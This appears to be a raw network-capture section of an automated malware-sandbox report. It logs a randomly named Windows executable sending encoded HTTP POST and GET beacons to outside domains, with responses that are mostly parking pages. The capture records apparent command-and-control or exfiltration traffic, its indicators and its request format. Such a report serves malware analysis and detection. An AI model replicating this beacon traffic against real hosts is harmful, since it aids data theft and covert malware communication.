                                                                                Nov 26, 2024 09:29:56.496808052 CET75INData Raw: 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: ... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.849746208.91.197.27806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:03.863311052 CET734OUTPOST /1y0g/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.regislemberthe.online
                                                                                Referer: http://www.regislemberthe.online/1y0g/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 6a 58 61 71 55 64 6e 6e 56 68 53 6b 51 66 79 30 69 4a 72 78 50 52 4c 52 4d 5a 36 4d 31 69 6e 52 75 2f 78 56 64 65 4e 4d 6e 5a 33 6f 34 53 47 74 79 6b 35 31 4b 6e 54 33 36 38 79 42 46 2b 59 75 65 7a 42 48 4a 66 77 53 59 49 4a 54 2f 4c 61 4d 62 65 6d 4c 62 67 6c 37 4a 4c 4f 49 2f 72 46 47 57 57 41 72 56 7a 6c 45 59 38 79 6b 74 4a 35 4b 78 65 71 52 52 50 6e 44 5a 75 73 78 53 65 5a 39 6a 7a 52 39 69 62 77 43 61 42 33 46 35 62 4d 5a 2f 6b 47 5a 64 65 50 7a 36 6c 33 52 4f 35 51 75 78 4c 6a 75 79 6f 5a 4e 33 7a 4a 5a 58 50 6d 49 75 43 2b 39 33 64 48 6b 46 4c 73 3d
                                                                                Data Ascii: ynlT=FGGxLekk0opajXaqUdnnVhSkQfy0iJrxPRLRMZ6M1inRu/xVdeNMnZ3o4SGtyk51KnT368yBF+YuezBHJfwSYIJT/LaMbemLbgl7JLOI/rFGWWArVzlEY8yktJ5KxeqRRPnDZusxSeZ9jzR9ibwCaB3F5bMZ/kGZdePz6l3RO5QuxLjuyoZN3zJZXPmIuC+93dHkFLs=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.849747208.91.197.27806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:06.536222935 CET754OUTPOST /1y0g/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.regislemberthe.online
                                                                                Referer: http://www.regislemberthe.online/1y0g/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 69 7a 65 71 50 38 6e 6e 45 52 53 72 66 2f 79 30 33 35 72 71 50 52 33 52 4d 62 58 4a 31 78 54 52 75 66 42 56 63 66 4e 4d 72 35 33 6f 7a 79 47 6f 76 30 35 36 4b 6e 66 4a 36 38 2b 42 46 36 77 75 65 78 4a 48 4a 73 59 56 59 59 4a 52 79 72 61 4f 56 2b 6d 4c 62 67 6c 37 4a 4c 62 6e 2f 72 39 47 56 6d 77 72 55 57 4a 48 62 38 79 37 36 35 35 4b 6e 75 71 64 52 50 6e 31 5a 73 59 62 53 61 70 39 6a 79 42 39 37 71 77 4e 51 42 33 48 6b 72 4e 63 33 58 57 53 59 74 44 66 6d 57 62 6b 42 66 4d 54 39 64 53 45 6f 4b 52 4c 30 7a 68 79 58 4d 4f 2b 72 31 6a 56 74 2b 58 55 62 63 35 63 53 4d 63 76 48 5a 70 73 76 35 51 44 33 48 71 75 6b 69 44 4e
                                                                                Data Ascii: ynlT=FGGxLekk0opaizeqP8nnERSrf/y035rqPR3RMbXJ1xTRufBVcfNMr53ozyGov056KnfJ68+BF6wuexJHJsYVYYJRyraOV+mLbgl7JLbn/r9GVmwrUWJHb8y7655KnuqdRPn1ZsYbSap9jyB97qwNQB3HkrNc3XWSYtDfmWbkBfMT9dSEoKRL0zhyXMO+r1jVt+XUbc5cSMcvHZpsv5QD3HqukiDN


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.849748208.91.197.27806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:09.204523087 CET1771OUTPOST /1y0g/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.regislemberthe.online
                                                                                Referer: http://www.regislemberthe.online/1y0g/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 69 7a 65 71 50 38 6e 6e 45 52 53 72 66 2f 79 30 33 35 72 71 50 52 33 52 4d 62 58 4a 31 78 4c 52 76 75 68 56 64 34 68 4d 6c 5a 33 6f 77 79 47 70 76 30 35 6a 4b 6b 76 7a 36 39 43 52 46 38 30 75 66 55 64 48 4c 64 59 56 57 59 4a 52 74 37 61 54 62 65 6e 54 62 67 31 33 4a 4c 4c 6e 2f 72 39 47 56 6b 34 72 51 44 6c 48 58 63 79 6b 74 4a 35 4f 78 65 71 78 52 50 66 4c 5a 73 4e 75 53 4c 56 39 6b 53 78 39 67 38 45 4e 53 68 33 42 6e 72 4e 36 33 58 62 4b 59 74 66 31 6d 58 75 2f 42 59 67 54 2f 59 69 59 31 72 4a 69 71 79 38 42 5a 75 4f 2b 6f 48 48 68 7a 2f 62 58 58 4f 56 62 64 71 45 36 48 72 56 6d 37 6f 56 37 71 44 57 30 7a 58 61 34 55 2b 6e 74 58 76 54 4b 5a 65 35 71 75 37 4d 5a 32 70 72 77 56 50 30 56 45 68 59 46 36 38 63 4b 38 54 6c 67 67 34 57 31 5a 55 45 70 73 58 6e 59 7a 37 67 35 63 58 7a 49 54 74 35 39 33 6d 62 47 48 58 59 58 43 6e 6a 48 47 4e 35 64 62 38 34 39 52 30 6e 47 77 39 4d 50 32 44 4b 4d 4b 50 62 30 49 45 4f 59 38 41 38 41 45 48 34 4c 4a 4e 63 4a 36 [TRUNCATED]
                                                                                Data Ascii: ynlT=FGGxLekk0opaizeqP8nnERSrf/y035rqPR3RMbXJ1xLRvuhVd4hMlZ3owyGpv05jKkvz69CRF80ufUdHLdYVWYJRt7aTbenTbg13JLLn/r9GVk4rQDlHXcyktJ5OxeqxRPfLZsNuSLV9kSx9g8ENSh3BnrN63XbKYtf1mXu/BYgT/YiY1rJiqy8BZuO+oHHhz/bXXOVbdqE6HrVm7oV7qDW0zXa4U+ntXvTKZe5qu7MZ2prwVP0VEhYF68cK8Tlgg4W1ZUEpsXnYz7g5cXzITt593mbGHXYXCnjHGN5db849R0nGw9MP2DKMKPb0IEOY8A8AEH4LJNcJ6w1OYra8LU+X0yGV8nFtIj7RBPiaSimB2v9Uo2/P8lDSAreHWm6K12l5CdJOkgI09IOb4HJRv8JE+xHYM86MsALSbyOtrL1dvZyGsF9B5+hYlkSh9cVpqauh6fMSxxHzP6O3Cr+mbwerPtjAP9ccF7JNhedXmUQfB19fxSVIWnTprpk8v2oOIXeIrpPEab22r89qib4EWaRokGRBo23IzXynxcysrgfs1fOACZQDEHOhUyxT7FzMlP+5OlqMAtsNiCgSUJDQlzNLCbtt9JdouA3Yy+7Vr7DGAW1wdgfqBpHou2Q22YfdlbzjvlMOY0bhmEP26Kyf1Nl5J6+5bxUe6X+AcPG76H870MdWj8li1G9Dfox8Vv9CQBjtUU3GYq3YxwTncQtGJuNJt/1LCDC3XmJsWVO8WUsAgkItSG/4sVrDNF/EW9JQw+rSr80zGX6cco2SGE6LDHWN+FhIL0Q5uXtt+cUc8/ZRHUzAsEgywwYAIaYKEYlalkz3nsx5BUI7JEqYysl+FbD2Lu0NVJp/Rfp+xiIb2XTip76w07+9ves7EXfSFkzqXzU+WHeKklUHuI2b1eRA/d/8Wwc0fb+D1ePQDRmtMCZfKGbQObRjw9UmzsNY2hrsly888BhL0DUveoe/SRviU3Q8WYtPAIT45Xw/A/1QM1wh+vQ [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.849749208.91.197.27806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:11.870946884 CET461OUTGET /1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:30:13.423017979 CET1236INHTTP/1.1 200 OK
                                                                                Date: Tue, 26 Nov 2024 08:30:12 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=908vr480155413032682401; expires=Sun, 25-Nov-2029 08:30:13 GMT; Max-Age=157680000; path=/; domain=www.regislemberthe.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iNBkSjT5nnnENXYYQwJSucQzt7UkU5o4d/xlQaaB9LEASPkn7SpNfeQ4EejaS+6dH+uQZVfbAFPpk7y+T6mJ4g==
                                                                                Content-Length: 2645
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 69 4e 42 6b 53 6a 54 35 6e 6e 6e 45 4e 58 59 59 51 77 4a 53 75 63 51 7a 74 37 55 6b 55 35 6f 34 64 2f 78 6c 51 61 61 42 39 4c 45 41 53 50 6b 6e 37 53 70 4e 66 65 51 34 45 65 6a 61 53 2b 36 64 48 2b 75 51 5a 56 66
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iNBkSjT5nnnENXYYQwJSucQzt7UkU5o4d/xlQaaB9LEASPkn7SpNfeQ4EejaS+6dH+uQZVf
                                                                                Nov 26, 2024 09:30:13.423084021 CET1236INData Raw: 62 41 46 50 70 6b 37 79 2b 54 36 6d 4a 34 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69
                                                                                Data Ascii: bAFPpk7y+T6mJ4g=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.regislemberthe.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.regislemberthe.online/px.js?c
                                                                                Nov 26, 2024 09:30:13.423120022 CET1169INData Raw: 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c
                                                                                Data Ascii: </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.849750199.59.243.227806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:19.841239929 CET698OUTPOST /c8xp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.honk.city
                                                                                Referer: http://www.honk.city/c8xp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 73 42 46 2f 67 6a 4f 7a 67 45 5a 68 35 45 4d 35 59 4a 36 38 67 33 45 72 4f 79 46 78 5a 54 52 46 64 6b 36 55 33 64 66 34 61 56 74 50 6c 77 6c 6d 4d 37 54 62 58 4b 38 36 75 6e 7a 33 76 61 54 37 71 45 53 6e 51 6e 5a 54 46 41 5a 76 71 79 71 6c 57 54 61 36 70 30 44 67 66 4a 79 61 66 6a 5a 2f 4d 62 47 71 44 74 42 52 5a 37 65 50 4f 41 70 6d 52 44 6b 31 73 57 39 2b 66 7a 74 57 31 73 78 4c 4c 63 6b 67 35 2f 33 35 4c 6f 56 2f 71 5a 37 6a 66 39 56 4c 78 58 51 57 4e 4a 62 2f 43 34 52 44 76 62 48 4a 35 66 50 79 53 2b 38 2b 49 53 45 75 64 41 49 77 61 4a 36 4b 61 78 38 3d
                                                                                Data Ascii: ynlT=o0J+MpKGqHuAsBF/gjOzgEZh5EM5YJ68g3ErOyFxZTRFdk6U3df4aVtPlwlmM7TbXK86unz3vaT7qESnQnZTFAZvqyqlWTa6p0DgfJyafjZ/MbGqDtBRZ7ePOApmRDk1sW9+fztW1sxLLckg5/35LoV/qZ7jf9VLxXQWNJb/C4RDvbHJ5fPyS+8+ISEudAIwaJ6Kax8=
                                                                                Nov 26, 2024 09:30:20.966624022 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:20 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1102
                                                                                x-request-id: 7c51611e-19e8-4924-abb1-61cd3c757d17
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==
                                                                                set-cookie: parking_session=7c51611e-19e8-4924-abb1-61cd3c757d17; expires=Tue, 26 Nov 2024 08:45:20 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 5a 70 53 32 38 65 36 63 30 58 37 30 33 4d 49 6b 2b 54 67 49 49 65 52 35 36 39 61 79 4e 57 57 49 33 4a 51 49 74 6f 72 34 72 4b 6f 66 6d 67 71 72 74 6c 6b 35 2f 74 75 65 4f 36 4f 37 37 6d 6f 78 78 6a 76 51 77 53 66 6f 69 61 4f 35 43 73 53 6a 4b 4e 4a 79 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:20.966640949 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2M1MTYxMWUtMTllOC00OTI0LWFiYjEtNjFjZDNjNzU3ZDE3IiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.849751199.59.243.227806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:22.507232904 CET718OUTPOST /c8xp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.honk.city
                                                                                Referer: http://www.honk.city/c8xp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 76 67 31 2f 6d 41 32 7a 77 55 5a 75 33 6b 4d 35 42 5a 36 34 67 33 59 72 4f 33 39 68 59 68 31 46 64 42 65 55 32 63 66 34 62 56 74 50 74 51 6c 5a 52 72 54 41 58 4b 77 4d 75 6e 50 33 76 61 48 37 71 46 69 6e 51 30 42 53 45 51 5a 74 30 53 71 64 53 54 61 36 70 30 44 67 66 4a 6d 67 66 6a 42 2f 4d 71 32 71 43 4d 42 51 47 4c 65 41 4a 41 70 6d 47 54 6b 50 73 57 39 59 66 33 74 77 31 71 31 4c 4c 65 73 67 35 71 44 34 42 6f 56 78 30 70 36 4d 51 50 59 2f 32 67 59 51 52 4a 32 62 4b 59 68 72 75 74 32 6a 6a 39 48 30 52 2b 55 56 49 52 73 59 59 33 56 59 41 71 71 36 45 6d 71 5a 49 48 65 72 67 57 31 65 64 2f 46 4f 6c 6a 70 54 49 37 2f 57
                                                                                Data Ascii: ynlT=o0J+MpKGqHuAvg1/mA2zwUZu3kM5BZ64g3YrO39hYh1FdBeU2cf4bVtPtQlZRrTAXKwMunP3vaH7qFinQ0BSEQZt0SqdSTa6p0DgfJmgfjB/Mq2qCMBQGLeAJApmGTkPsW9Yf3tw1q1LLesg5qD4BoVx0p6MQPY/2gYQRJ2bKYhrut2jj9H0R+UVIRsYY3VYAqq6EmqZIHergW1ed/FOljpTI7/W
                                                                                Nov 26, 2024 09:30:23.585691929 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:22 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1102
                                                                                x-request-id: e9eb5493-4ce8-4be4-a275-4b80b78c244c
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==
                                                                                set-cookie: parking_session=e9eb5493-4ce8-4be4-a275-4b80b78c244c; expires=Tue, 26 Nov 2024 08:45:23 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 5a 70 53 32 38 65 36 63 30 58 37 30 33 4d 49 6b 2b 54 67 49 49 65 52 35 36 39 61 79 4e 57 57 49 33 4a 51 49 74 6f 72 34 72 4b 6f 66 6d 67 71 72 74 6c 6b 35 2f 74 75 65 4f 36 4f 37 37 6d 6f 78 78 6a 76 51 77 53 66 6f 69 61 4f 35 43 73 53 6a 4b 4e 4a 79 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:23.585711002 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTllYjU0OTMtNGNlOC00YmU0LWEyNzUtNGI4MGI3OGMyNDRjIiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.849752199.59.243.227806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:30:25.182893991 CET1735OUTPOST /c8xp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.honk.city
                                                                                Referer: http://www.honk.city/c8xp/
